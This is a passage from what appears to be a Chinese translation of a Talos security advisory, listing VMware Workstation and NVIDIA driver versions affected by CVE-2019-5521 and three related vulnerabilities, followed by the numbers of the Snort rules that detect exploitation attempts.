经过Talos测试,确认CVE-2019-5521影响VMware Workstation 15(15.0.2 build-10952284),其中Guest虚拟机使用Windows 10 x64操作系统。其他三个漏洞影响NVWGF2UMX_CFG.DLL的25.21.14.2531版本、NVIDIA D3D10的425.31版本(使用NVIDIA Quadro K620)和VMware Workstation 15(15.0.4 build-12990004,Guest虚拟机运行Windows 10 x64)。
七、检测
下面的SNORT规则可以检测到漏洞利用尝试。需要注意的是,可能会在未来发布其他规则,并且根据新的漏洞信息,当前规则可能会发生更改。有关最新的规则信息,请查阅Firepower管理中心或Snort.org。
Snort规则:48852、48853、49894、49895、49896、49897、49205、49206